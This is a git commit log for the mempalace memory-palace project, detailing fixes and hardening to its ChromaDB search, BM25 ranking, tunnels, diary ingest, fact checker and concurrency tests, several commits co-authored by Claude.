Igor Lins e Silva 5320246297 Merge pull request #807 from sha2fiddy/fix/218-cosine-distance-metadata
Fix: set cosine distance metadata on all collection creation sites
2026-04-13 21:18:40 -03:00
Milla J 62df24599e fix: README audit — 42 TDD tests + hall detection + 7 claim fixes (#835)
* fix: README audit — match every claim to shipped code + add hall detection

TDD audit: wrote 42 tests verifying README claims against codebase.
Fixed all 7 failures:

1. Tool count: 19 → 29 (10 tools were undocumented)
2. Added tool table rows for tunnels, drawer management, system tools
3. Version badge: 3.1.0 → 3.2.0
4. dialect.py file reference: "30x lossless" → "AAAK index format for closet pointers"
5. Wake-up token cost: "~170 tokens" → "~600-900 tokens" (matches layers.py)
6. pyproject.toml version in project structure: v3.0.0 → v3.2.0
7. Hall detection: added detect_hall() to miner.py — drawers now tagged
   with hall metadata so palace_graph.py can build hall connections

New code:
- miner.py: detect_hall() — keyword scoring against config hall_keywords,
  writes hall field to every drawer's metadata
- tests/test_hall_detection.py — 12 TDD tests (written before code)
- tests/test_readme_claims.py — 42 TDD tests verifying README accuracy

859/859 tests pass.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: resolve ruff lint — unused imports and variables

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* style: ruff format with CI-pinned 0.4.x

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: use conftest fixtures in hall tests for Windows compat

Windows CI fails with NotADirectoryError when ChromaDB tries to
write HNSW files in short-lived TemporaryDirectory. Use conftest
palace_path and tmp_dir fixtures instead — same pattern as all
other tests that touch ChromaDB.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: address Igor's review — convo_miner halls, cached config, markdown typo

TDD: wrote tests for convo_miner hall metadata and config caching
BEFORE verifying the code changes.

1. README markdown typo: extra ** in wake-up token row (line 195)
2. convo_miner.py: added _detect_hall_cached() — conversation
   drawers now get hall metadata (was missing, Igor caught it)
3. miner.py + convo_miner.py: cached hall_keywords at module level
   so config.json isn't re-read per drawer during bulk mine
4. New tests: TestConvoMinerWritesHalls, TestDetectHallCaching

861/861 tests pass. ruff clean.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-04-13 17:11:11 -07:00
eblander 8dc5970ca9 Fix: ruff format with CI-pinned version (0.4.x) 2026-04-13 18:29:48 -04:00
Igor Lins e Silva 1dc20e307b test: verify mine_lock via disjoint critical-section intervals
The previous revision used multiprocessing but still relied on timing
("second process waited at least N seconds") which flakes on CI where
spawn overhead eats into the hold window. Linux CI observed the second
process report a 0.088s wait — below the 0.1s threshold — even though
the lock behavior was correct; spawn was just slow enough that the
first process had nearly finished holding when the second got past
its own spawn.

Switch to effect-based verification: each worker logs its
[enter_time, exit_time] inside the critical section, and the test
asserts the two intervals are disjoint after sorting. A broken lock
would produce overlapping intervals regardless of spawn latency; a
working lock cannot.

Also removed the mp.Queue since we no longer pass timing data back.
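
A minimal sketch of the disjoint-interval check, assuming each worker records an `(enter_time, exit_time)` pair; the helper name is hypothetical and the real test may structure this differently.

```python
def intervals_disjoint(intervals):
    """True if no two (enter, exit) intervals overlap.

    After sorting by enter time, it is enough to compare each interval
    with its immediate successor.
    """
    ordered = sorted(intervals)
    return all(
        prev_exit <= next_enter
        for (_, prev_exit), (next_enter, _) in zip(ordered, ordered[1:])
    )
```

The check depends only on the recorded order of events, so slow process spawn shifts both intervals without making them overlap.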
2026-04-13 19:08:57 -03:00
Igor Lins e Silva e052074624 test: serialize mine_lock concurrency test with multiprocessing
The macOS CI job failed ``test_lock_blocks_concurrent_access`` because
``fcntl.flock`` on BSD/macOS is per-*process*, not per-FD: two threads
in the same process both acquire even when they open their own file
descriptors. The test passed on Linux (per-FD flock) and Windows
(per-FD ``msvcrt.locking``) but was never actually exercising the
lock's real contract.

``mine_lock`` is designed to serialize multi-*agent* access — i.e.,
separate processes, not threads. Switch the test to
``multiprocessing.get_context('spawn')`` with a module-level worker
(so the spawn pickles cleanly) so it:

  1. reflects the actual use case (one lock per mining process);
  2. passes on all three OSes without flock-semantics branching;
  3. catches real regressions (a broken lock would now let both
     processes through, exactly what we care about).

Hold time bumped to 0.3s and the "wait until p1 acquires" delay to
0.2s to tolerate spawn's higher startup latency on macOS/Windows.
2026-04-13 19:02:51 -03:00
Igor Lins e Silva 7192552624 test: make diary state path assertion platform-neutral
The Windows CI job failed on:

    assert '/.mempalace/state/' in str(state_path)

because Windows uses ``\`` as the path separator, so the substring
never matches. The behavior under test (state file lives outside the
diary dir, under ``~/.mempalace/state/``) is already correct on both
platforms — only the assertion was Unix-only.

Switch to ``state_path.parent`` comparisons that work on any OS.
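
A sketch of the separator-independent comparison, using `pathlib`'s pure path classes so that both flavours can be exercised on any OS. The helper name and the example file name are hypothetical.

```python
from pathlib import PurePosixPath, PureWindowsPath


def lives_under_state_dir(state_path, home):
    """Compare path components instead of searching for a '/'-joined substring."""
    return state_path.parent == home / ".mempalace" / "state"


posix_state = PurePosixPath("/home/me/.mempalace/state/diary_state.json")
windows_state = PureWindowsPath(r"C:\Users\me\.mempalace\state\diary_state.json")

# The old substring assertion only matches when the separator is '/'.
substring_ok_on_windows = "/.mempalace/state/" in str(windows_state)
```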
2026-04-13 18:55:36 -03:00
Igor Lins e Silva 6b7dcc53d4 merge: pr/closet-llm-generic + harden LLM regen path for production
Brings in PR #793 (optional LLM-based closet regeneration via
user-configured OpenAI-compatible endpoint) and PR #795 (hybrid
closet+drawer search — closets boost, never gate). Stack: #784 → #788 → #789 → #790 → #791 → #792 → #793 (+ #795).

Findings hardened on our side
─────────────────────────────

1) closet_llm.regenerate_closets didn't use the blessed palace helpers.

   Before:
     * manual closets_col.get(where=...) + .delete(ids=...) with a
       silent ``except Exception: pass`` around both — if the purge
       failed, pre-existing regex closets survived alongside fresh LLM
       closets, giving the searcher double hits for the same source.
     * ``source.split('/')[-1][:30]`` to build the closet_id — quietly
       wrong on Windows paths (``C:\\proj\\a.md`` has no ``/``, so the
       whole string ends up in the ID).
     * no mine_lock around purge+upsert — a concurrent regex rebuild of
       the same source could interleave with our purge and leave a mix
       of regex and LLM pointers.
     * no ``normalize_version`` stamp on the LLM closets — the miner's
       stale-version gate would treat them as leftovers from an older
       schema and rebuild over them on the next mine.

   After: routes through ``purge_file_closets`` + ``mine_lock`` +
   ``os.path.basename`` + ``NORMALIZE_VERSION`` stamp. Regression tests
   cover each.
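
To make the Windows path issue concrete, the sketch below uses `ntpath`, which is the module `os.path` resolves to on Windows, so the result is the same on any OS. The variable names are illustrative only.

```python
import ntpath

windows_source = r"C:\proj\a.md"

# Splitting on '/' finds no separator, so the whole path leaks into the ID.
naive_name = windows_source.split("/")[-1][:30]

# The Windows flavour of basename understands both '\\' and '/'.
portable_name = ntpath.basename(windows_source)[:30]
```

Here `naive_name` is still the full path, while `portable_name` is just `a.md`.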

2) searcher.search_memories was still closet-first.

   PR #795 merged into #793's head to fix the recall regression
   documented in that PR (R@1 0.25 on narrative content vs. 0.42
   baseline). The hybrid design makes closets a ranking boost rather
   than a gate: drawers are always queried at the floor, and matching
   closet hits (rank 0-4 within CLOSET_DISTANCE_CAP=1.5) add a boost
   of 0.40/0.25/0.15/0.08/0.04 to the effective distance.

   Merged to take the incoming hybrid design, with three adjustments:
   * kept the ``_expand_with_neighbors`` / ``_extract_drawer_ids_from_closet``
     helpers as separately-tested utilities (still imported by tests
     and future callers);
   * replaced the fragile ``source_file.endswith(basename)`` reverse-
     lookup in the enrichment step with internal ``_source_file_full``
     / ``_chunk_index`` fields stripped before return, so enrichment
     doesn't silently pick the wrong path when two sources share a
     basename across directories;
   * drawer-grep enrichment now sorts by ``chunk_index`` before
     neighbor expansion, so ``best_idx ± 1`` corresponds to actual
     document order rather than whatever order Chroma returned.

3) Closet-first tests in test_closets.py (``TestSearchMemoriesClosetFirst``,
   end-to-end ``test_closet_first_search_includes_drawer_index_and_total``)
   pinned contracts that the hybrid path now violates (``matched_via``
   went from ``"closet"`` to ``"drawer+closet"``). Rewrote them around
   the new invariant: direct drawers are always the floor, closet
   agreement flips the hit's matched_via and exposes closet_preview.

Verification
────────────

* 805/805 pass under ``uv run pytest tests/ -v --ignore=tests/benchmarks``
  (13 new tests from PR #793 + 5 from PR #795 + 2 new regressions for
  the closet_llm hardening + the rewritten hybrid assertions in
  test_closets.py).
* CI-pinned ruff 0.4.x clean on ``mempalace/`` + ``tests/`` (check +
  format both pass).
* No new deps — closet_llm.py still uses stdlib ``urllib.request`` per
  the PR's "zero new dependencies" promise.

Co-Authored-By: MSL <232237854+milla-jovovich@users.noreply.github.com>
2026-04-13 18:40:36 -03:00
Igor Lins e Silva 1263c3c91e merge: full hardened stack + rewrite fact_checker around actual KG API
Merges the full hardened stack (up through #791 drawer-grep) and turns
fact_checker from "dead code hidden behind bare except" into an
actually-working offline contradiction detector with tests.

## Dead paths the PR body advertised but the code never executed

Both buried by a single outer ``except Exception: pass``:

  * ``kg.query(subject)`` — ``KnowledgeGraph`` has no ``query()`` method;
    it has ``query_entity()``. The attribute error was silently swallowed
    and the entire KG branch always returned ``[]``. Now using
    ``kg.query_entity(subject, direction="outgoing")`` with proper
    handling of the ``predicate``/``object``/``current``/``valid_to``
    fields the real API returns.
  * ``KnowledgeGraph(palace_path=palace_path)`` — the constructor's only
    kwarg is ``db_path``. Passing ``palace_path`` raised TypeError,
    silently swallowed. Now computing the db_path correctly from
    ``<palace>/knowledge_graph.sqlite3``, matching the convention the
    MCP server already uses.

## Contradiction logic rewritten

The previous ``if kg_pred in claim and fact.object not in claim`` only
fired when text used the SAME predicate word as the KG fact — the exact
opposite of the stated use case ("Bob is Alice's brother" when the KG
says "husband" would NOT have fired). Replaced with a proper parse →
lookup → compare pipeline:

  * ``_extract_claims`` parses two surface forms ("X is Y's Z" and
    "X's Z is Y") into ``(subject, predicate, object)`` triples.
  * ``_check_kg_contradictions`` pulls the subject's outgoing facts
    and flags two classes:
      - ``relationship_mismatch`` when a current KG fact matches the
        same ``(subject, object)`` pair but with a different predicate.
      - ``stale_fact`` when the exact triple exists but is
        ``valid_to``-closed in the past.
  * Stale-fact detection is now implemented (the PR body claimed it;
    the old code silently didn't implement it).
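
A rough sketch of the parse → lookup → compare idea, not the actual `_extract_claims` / `_check_kg_contradictions` code. The regexes, the orientation of the triple (here "Bob is Alice's brother" becomes `("Bob", "brother", "Alice")`), and the dict shape of a KG fact are all assumptions.

```python
import re

# Surface form 1: "X is Y's Z"    Surface form 2: "Y's Z is X"
IS_POSSESSIVE = re.compile(r"\b([A-Z]\w+) is ([A-Z]\w+)'s (\w+)")
POSSESSIVE_IS = re.compile(r"\b([A-Z]\w+)'s (\w+) is ([A-Z]\w+)")


def extract_claims(text):
    """Return (subject, predicate, object) triples for both surface forms."""
    claims = [(s, p, o) for s, o, p in IS_POSSESSIVE.findall(text)]
    claims += [(s, p, o) for o, p, s in POSSESSIVE_IS.findall(text)]
    return claims


def relationship_mismatches(claim, outgoing_facts):
    """Current facts about the same object that carry a different predicate.

    outgoing_facts is assumed to be the subject's outgoing facts, each a dict
    with 'predicate', 'object' and 'current' keys.
    """
    _, predicate, obj = claim
    return [
        fact
        for fact in outgoing_facts
        if fact["current"] and fact["object"] == obj and fact["predicate"] != predicate
    ]
```

With a current fact `husband → Alice` stored for Bob, the claim extracted from "Bob is Alice's brother" is flagged because the predicates differ while the pair matches.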

## Performance fix — O(n²) → O(mentioned × n)

``_check_entity_confusion`` previously computed Levenshtein for every
pair of registered names on every ``check_text`` call. For 1,000
registered names that's ~500K edit-distance calls per hook invocation.
Now we first identify which registry names actually appear in the text
(single regex scan), then only compute edit distance between mentioned
and unmentioned names. Pinned by a test that asserts <200ms on a 500-
name registry with zero mentions.

Also: when *both* similar names are mentioned in the text, we no
longer flag them — the user clearly knows they're different people.
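
A sketch of the "mentioned × n" strategy under stated assumptions: the function names, the distance threshold, and the return shape are hypothetical, and the real `_check_entity_confusion` may differ.

```python
import re


def edit_distance(a, b):
    """Levenshtein distance, computed row by row."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def confusable_names(text, registry, max_distance=1):
    """Pairs (mentioned, unmentioned) of registry names that look alike."""
    if not registry:
        return []
    # One regex scan finds every registry name that appears in the text.
    alternation = "|".join(re.escape(name) for name in sorted(registry, key=len, reverse=True))
    mentioned = set(re.findall(r"\b(" + alternation + r")\b", text))
    # Edit distance is only computed for mentioned x unmentioned pairs, so
    # text with zero mentions costs no distance calls, and two similar names
    # that are both mentioned are never compared with each other.
    unmentioned = set(registry) - mentioned
    return sorted(
        (m, u) for m in mentioned for u in unmentioned if edit_distance(m, u) <= max_distance
    )
```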

## Shared entity-registry loader

``mempalace/miner.py`` already had an mtime-cached loader for
``~/.mempalace/known_entities.json``. fact_checker had a duplicate
implementation that leaked file handles and ignored caching. Extended
miner's cache to expose both the flat set (``_load_known_entities``)
and the raw category dict (``_load_known_entities_raw``); fact_checker
now imports the latter. No more double disk reads, no more handle leak.
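
A minimal sketch of an mtime-keyed cache of this kind. The function name, the cache layout, and the empty-dict fallback for a missing file are assumptions rather than the code in ``mempalace/miner.py``.

```python
import json
import os

# path -> (mtime, parsed JSON); hypothetical module-level cache.
_CACHE = {}


def load_known_entities_raw(path):
    """Return the parsed registry, re-reading only when the file's mtime changes."""
    try:
        mtime = os.path.getmtime(path)
    except OSError:
        return {}  # missing or unreadable registry: treat as empty
    cached = _CACHE.get(path)
    if cached is None or cached[0] != mtime:
        # Context manager closes the handle even if json.load raises.
        with open(path, encoding="utf-8") as handle:
            cached = (mtime, json.load(handle))
        _CACHE[path] = cached
    return cached[1]
```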

## Tests — 24 cases in tests/test_fact_checker.py

All three detection paths + both dead-code regressions:
  * ``test_kg_init_uses_db_path_not_palace_path_kwarg`` — pins the
    correct KG constructor signature so the ``palace_path=`` bug can't
    come back.
  * ``test_relationship_mismatch_detected`` — the headline example from
    the PR body now actually fires.
  * ``test_stale_fact_detected`` — valid_to-closed triple is flagged.
  * ``test_current_fact_same_triple_is_not_flagged`` — no false positive
    on a still-valid match.
  * ``test_performance_bounded_by_mentioned_names`` — 500-name registry,
    zero mentions, <200ms. Regression for the O(n²) blowup.
  * ``test_no_false_positive_when_both_names_mentioned`` — Mila and
    Milla in the same text is fine.
  * Plus claim extraction, flatten_names shapes, CLI exit code, empty
    text handling, missing-palace graceful fallback, registry-dict
    shape support.

785/785 suite pass. ruff + format clean on CI-pinned 0.4.x.
2026-04-13 18:20:11 -03:00
Igor Lins e Silva e9201fb617 merge: pr/cross-wing-tunnels + rebuild drawer-grep on hardened closet path
Merges the full hardened stack (#788 closets, #789 entity/BM25/diary,
#790 tunnels) and reimplements the drawer-grep feature in a way that
composes with the chunk-level closet-first search instead of fighting it.

## Background

The original PR added "drawer-grep" on top of the pre-hardening closet
code that returned whole-file blobs. My #788 hardening changed that
path to return *chunk-level* hits by parsing each closet's
``→drawer_id`` pointers and hydrating exactly those drawers. That made
the original drawer-grep grep-over-all-drawers logic redundant — the
closet already points at the relevant chunk.

What remained valuable from the original PR was the *context expansion*
idea: a chunk boundary can clip a thought mid-stride (matched chunk
says "here's a breakdown:" and the breakdown lives in the next chunk),
so callers want ±1 neighbor chunks for free rather than a follow-up
get_drawer call.

## Change

New ``_expand_with_neighbors(drawers_col, doc, meta, radius=1)`` helper
in searcher.py:

* Reads ``source_file`` + ``chunk_index`` from the matched drawer's
  metadata.
* Fetches the ±radius sibling chunks in a SINGLE ChromaDB query using
  ``$and + $in`` — no "fetch all drawers for source" blowup.
* Sorts retrieved chunks by chunk_index, joins with ``\n\n``.
* Does a cheap metadata-only second query to compute ``total_drawers``
  so callers know where in the file they landed.
* Graceful fallback to the matched doc alone on any ChromaDB failure or
  missing metadata — search never breaks because expansion failed.
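
For illustration, the single-query neighbor fetch can be sketched as a ChromaDB ``where`` filter plus an in-order join. The helper names are hypothetical, and only the metadata keys ``source_file`` and ``chunk_index`` come from the description above.

```python
def neighbor_filter(source_file, chunk_index, radius=1):
    """Build a where-filter selecting the matched chunk and its +/-radius siblings."""
    wanted = [
        i
        for i in range(chunk_index - radius, chunk_index + radius + 1)
        if i >= 0  # no chunk exists before index 0
    ]
    return {
        "$and": [
            {"source_file": source_file},
            {"chunk_index": {"$in": wanted}},
        ]
    }


def join_in_order(documents, metadatas):
    """Sort retrieved chunks by chunk_index and join them with blank lines."""
    ordered = sorted(zip(metadatas, documents), key=lambda pair: pair[0]["chunk_index"])
    return "\n\n".join(doc for _, doc in ordered)


# Assumed usage: drawers_col.get(where=neighbor_filter(src, idx), include=["documents", "metadatas"])
```

Indices past the end of the file simply match nothing, so the last chunk yields only its previous neighbor without an explicit bounds check.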

``_closet_first_hits`` now calls this helper and tags each hit with
``drawer_index`` + ``total_drawers``. Hit shape stays consistent with
the direct-search path (both still carry ``matched_via``) so callers
can't tell which path produced a given hit except via that field.

## Tests

6 new cases in TestDrawerGrepExpansion:
* neighbors returned in chunk_index order (not hash order)
* edge case: matched chunk at index 0 — only next neighbor surfaces
* edge case: matched chunk at last index — only prev neighbor surfaces
* edge case: 1-drawer file — returns just the matched doc
* missing/non-int chunk_index metadata — graceful fallback
* end-to-end via ``search_memories`` — closet-first hit carries
  drawer_index, total_drawers, and includes ±1 neighbors

761/761 suite pass; ruff + format clean on CI-pinned 0.4.x.

Merge resolutions: miner.py kept develop's purge+NORMALIZE_VERSION;
searcher.py dropped the old whole-file-blob block entirely in favor of
rebuilding context expansion on top of ``_closet_first_hits``;
test_closets.py took develop's 47-test baseline and appended
TestDrawerGrepExpansion.
2026-04-13 18:08:01 -03:00
Igor Lins e Silva 20255b05be merge: develop + harden cross-wing tunnels for production
Merges the hardened closet/entity/BM25/diary stack from #789 and fixes
five correctness/durability issues in the tunnels module plus the
directional/symmetric design question.

## Design: tunnels are now symmetric

Per review discussion: a tunnel represents "these two things relate",
not "A causes B". The canonical ID now hashes the *sorted* endpoint
pair, so ``create_tunnel(A, B)`` and ``create_tunnel(B, A)`` resolve to
the same record and the second call updates the label rather than
creating a duplicate. ``follow_tunnels`` can be called from either
endpoint and surfaces the other side consistently.

The returned dict still preserves ``source``/``target`` in the order
the caller supplied, so UIs that want to render the connection
directionally can do so.
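
A sketch of a canonical ID built from the sorted endpoint pair. The hash function, the separator, and the 16-character truncation are assumptions; only the "sort before hashing" idea comes from the description above.

```python
import hashlib


def tunnel_id(endpoint_a, endpoint_b):
    """Same ID for (A, B) and (B, A); endpoints are (wing, room) tuples."""
    first, second = sorted([tuple(endpoint_a), tuple(endpoint_b)])
    # Sorting happens before hashing, so caller order never reaches the hash.
    key = "|".join(first + second)
    return hashlib.sha256(key.encode("utf-8")).hexdigest()[:16]
```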

## Correctness fixes

* **Atomic write** — ``_save_tunnels`` writes to ``tunnels.json.tmp``
  and ``os.replace``s it into place. A crash mid-write can no longer
  leave a truncated file that silently reads back as ``[]`` and wipes
  every tunnel. Includes ``f.flush() + os.fsync`` before replace on
  platforms that support it.
* **Concurrent-write lock** — ``create_tunnel`` and ``delete_tunnel``
  wrap the load→mutate→save cycle in ``mine_lock(_TUNNEL_FILE)``.
  Without this, two agents creating tunnels simultaneously would both
  read the same snapshot and the later writer would drop the earlier
  writer's tunnel.
* **Corrupt-file tolerance** — ``_load_tunnels`` now uses a context
  manager, validates that the loaded JSON is a list, and returns ``[]``
  for any read failure. Subsequent ``create_tunnel`` then overwrites
  the corrupt file via atomic write — no manual recovery needed.
* **Input validation** — new ``_require_name`` helper rejects empty or
  whitespace-only wing/room names with a clear ``ValueError``. Prevents
  phantom tunnels with blank endpoints from ever reaching the JSON
  store.
* **Timezone-aware timestamps** — ``created_at`` / ``updated_at`` now
  use ``datetime.now(timezone.utc).isoformat()``, matching diary ingest
  and other recent modules.
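
The atomic-write and corrupt-file-tolerance fixes above can be sketched as follows. This is an illustration using hypothetical helper names, not the module's ``_save_tunnels`` / ``_load_tunnels``.

```python
import json
import os


def save_atomic(path, records):
    """Write to a sibling .tmp file, flush it to disk, then swap it into place."""
    tmp_path = path + ".tmp"
    with open(tmp_path, "w", encoding="utf-8") as handle:
        json.dump(records, handle)
        handle.flush()
        os.fsync(handle.fileno())
    # os.replace is atomic on the same filesystem: readers see old or new, never half.
    os.replace(tmp_path, path)


def load_tolerant(path):
    """Return the stored list, or [] if the file is missing, corrupt, or not a list."""
    try:
        with open(path, encoding="utf-8") as handle:
            data = json.load(handle)
    except (OSError, ValueError):  # json.JSONDecodeError subclasses ValueError
        return []
    return data if isinstance(data, list) else []
```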

## Tests (12 in TestTunnels)

5 original + 7 regression cases:
* ``test_tunnel_is_symmetric`` — A↔B and B↔A dedupe to one record.
* ``test_follow_tunnels_works_from_either_endpoint`` — symmetric surface.
* ``test_empty_endpoint_fields_rejected`` — validation guard.
* ``test_corrupt_tunnel_file_does_not_lose_new_writes`` — truncated
  JSON treated as empty; next create persists cleanly.
* ``test_atomic_write_leaves_no_stray_tmp_file`` — no leftover ``.tmp``.
* ``test_concurrent_creates_preserve_all_tunnels`` — 5 threads each
  create a distinct tunnel; all 5 persisted (regression for the
  read-modify-write race).
* ``test_created_at_is_timezone_aware`` — ISO8601 has tz suffix.

Merge resolutions: tests/test_closets.py combined develop's hardened
closet/entity/BM25/diary tests with this PR's TestTunnels class.

755/755 tests pass. ruff + format clean under CI-pinned 0.4.x.
2026-04-13 17:50:43 -03:00
Igor Lins e Silva 32d7f4376b merge: develop + harden entity metadata, BM25, and diary ingest for production
Merges develop (closet hardening #826, strip_noise #785, lock #784) and
replaces every sub-feature in this PR with a correct, tested
implementation. Shippable now.

## 1. Real Okapi-BM25 (searcher.py)

The prior `_bm25_score()` hardcoded `idf = log(2.0)` for every term — it
was really a scaled TF, not BM25, and couldn't tell a discriminative
term from a generic one. Replaced with `_bm25_scores(query, documents)`
that computes proper IDF over the provided candidate corpus using the
Lucene smoothed formula `log((N - df + 0.5) / (df + 0.5) + 1)`. Well-
defined for re-ranking vector-retrieval candidates — IDF there measures
how discriminative each term is *within the candidate set*, exactly the
signal we want.
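
A compact sketch of Okapi BM25 over a candidate set, using the smoothed IDF formula quoted above. The tokenizer and the `k1` / `b` defaults are assumptions; the shipped `_bm25_scores` may choose differently.

```python
import math
import re


def bm25_scores(query, documents, k1=1.5, b=0.75):
    """Score each document against the query; IDF is computed over `documents`."""
    def tokenize(text):
        return re.findall(r"\w+", text.lower())

    docs = [tokenize(doc) for doc in documents]
    n = len(docs)
    if n == 0:
        return []
    avg_len = (sum(len(doc) for doc in docs) / n) or 1.0
    scores = [0.0] * n
    for term in set(tokenize(query)):
        df = sum(1 for doc in docs if term in doc)
        if df == 0:
            continue
        # Smoothed IDF: small for terms in every candidate, large for rare ones.
        idf = math.log((n - df + 0.5) / (df + 0.5) + 1)
        for i, doc in enumerate(docs):
            tf = doc.count(term)
            if tf:
                norm = tf + k1 * (1 - b + b * len(doc) / avg_len)
                scores[i] += idf * tf * (k1 + 1) / norm
    return scores
```

A term that appears in every candidate still contributes, but far less than a term found in only one, which a fixed `log(2.0)` could not express.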

`_hybrid_rank` also fixed:
- Vector normalization is now absolute `max(0, 1 - dist)`, not
  `1 - dist/max_dist` — adding/removing a candidate no longer reshuffles
  the others.
- BM25 is min-max normalized within candidates (bounded [0, 1]).
- Closet path now re-ranks too (was previously returning closet-order
  hits without hybrid scoring).
- `_hybrid_score` internal field stripped from output; `bm25_score`
  exposed for debugging.
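
To show why the absolute form is stable, here is a small sketch comparing the two normalizations, plus min-max scaling for BM25. The function names are hypothetical, and how the real `_hybrid_rank` weights and combines the two signals is not shown.

```python
def absolute_similarity(distances):
    """max(0, 1 - dist): each score depends only on its own distance."""
    return [max(0.0, 1.0 - d) for d in distances]


def relative_similarity(distances):
    """1 - dist / max_dist: every score moves when the worst candidate changes."""
    worst = max(distances)
    return [1.0 - d / worst if worst else 1.0 for d in distances]


def min_max(values):
    """Scale values into [0, 1]; a constant list maps to all zeros."""
    low, high = min(values), max(values)
    if high == low:
        return [0.0] * len(values)
    return [(v - low) / (high - low) for v in values]
```

Adding an outlier at distance 1.8 leaves the absolute score of a 0.2 hit unchanged at 0.8, whereas its relative score rises from 0.6 to roughly 0.89.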

## 2. Entity metadata (miner.py)

- Reuses `_ENTITY_STOPLIST` from palace.py so sentence-starters like
  "When", "After", "The" no longer land as entities (regression test
  covers this).
- Known-entity registry is cached at module level, keyed by the
  registry file's mtime — no more disk read per drawer.
- File handle now uses a context manager.
- Truncates the entity LIST (to 25) before joining — never splits a
  name in the middle.

## 3. Diary ingest (diary_ingest.py)

- State file now lives at `~/.mempalace/state/diary_ingest_<hash>.json`,
  keyed by (palace_path, diary_dir). No more pollution of the user's
  content directory.
- Drawer IDs now hash `(wing, date_str)` — a user with personal + work
  diaries on the same day no longer silently clobbers.
- Each day's upsert runs inside `mine_lock(source_file)` so concurrent
  ingest from two terminals can't race.
- `force=True` now calls `purge_file_closets` before rebuild so
  leftover numbered closets from a longer prior day don't orphan.

## 4. Tests (tests/test_closets.py)

Merged this PR's MineLock/Entity/BM25/Diary tests with develop's
hardened Build/Upsert/Purge/Rebuild/SearchClosetFirst tests. Added
specific regression tests for every fix above:
- entity stoplist applies (no "When/After/The")
- entity list capped before join (no partial tokens)
- registry cached by mtime (mock-verified zero re-reads)
- BM25 IDF downweights terms present in every doc (real BM25 evidence)
- hybrid rank absolute normalization stable against outliers
- diary state file outside user's diary dir
- diary wing-prefixed IDs prevent cross-wing date collisions

35/35 closet tests pass; full suite 743/743. ruff + format clean under
CI-pinned 0.4.x.
2026-04-13 17:37:45 -03:00